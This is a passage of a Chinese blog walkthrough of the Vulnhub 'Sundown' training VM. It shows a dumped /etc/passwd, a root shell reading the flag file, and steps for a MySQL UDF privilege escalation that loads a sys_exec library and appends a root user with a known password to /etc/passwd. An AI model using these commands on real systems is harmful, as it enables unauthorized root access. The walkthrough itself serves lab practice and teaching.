bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
carlos@sundown:/tmp$ su - Dave
Password: 
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# cd /root
root@sundown:~# ls -alh
total 28K
drwx------  3 root root 4.0K Aug  3  2020 .
drwxr-xr-x 18 root root 4.0K Aug  3  2020 ..
lrwxrwxrwx  1 root root    9 Aug  3  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Aug  3  2020 .local
lrwxrwxrwx  1 root root    9 Aug  3  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 1.3K Aug  3  2020 proof.txt
-rw-r--r--  1 root root   66 Aug  3  2020 .selected_editor
root@sundown:~# cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~# 

步骤:

use mysql;

创建新表

create table potato(line blob);

insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));

SHOW VARIABLES LIKE ‘%plugin%’;

select * from potato into dumpfile
‘/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so’;

create function sys_exec returns integer soname ‘lib_mysqludf_sys_64.so’;

select sys_exec(‘echo
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);

这里用户名是Dave,密码是Password@973.

标签:sbin,Sundown,nologin,192.168,usr,wp,靶机,root,Vulnhub
From: https://www.cnblogs.com/jason-huawen/p/16884919.html

相关文章

  • Vulnhub So Simple 1靶机解题过程
    SoSimple1识别目标主机IP地址┌──(kali㉿kali)-[~]└─$sudonetdiscover-ieth1......
  • Vulnhub ReconForce靶机解题详细过程
    ReconForce识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/ReconForce]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:......
  • vulnhub靶场之DOUBLETROUBLE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DOUBLETROUBLE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/doubletrouble/doubl......
  • Vulnhub Potato靶机解题过程
    Potato识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Potato]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.85.0/16|ScreenView:UniqueHosts......
  • Vulnhub OSCP靶机解题过程
    OSCP识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/OSCP]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • 靶机: EvilBox---One
    靶机:EvilBox---One准备工作靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ovaMD5校验:c3a65197b891713731e6bb791d7ad259cmd进行校验:certu......
  • Vulnhub Noontide靶机解题过程
    Noontide识别目标主机IP地址......
  • vulnhub-dc4
    一.环境简介靶机:192.168.56.106攻击机:Windows10、kali(192.168.56.101)二、渗透测试复现1.信息收集我这里提前已经知道我的靶机IP地址为192.168.56.1/24,因为kali与靶机......
  • Vulnhub My Tomcat靶机解题过程
    MyTomcat识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/My_Tomcat]└─$sudonetdiscover-ieth14CapturedARPReq/Reppackets,from3hosts.Totalsize:24......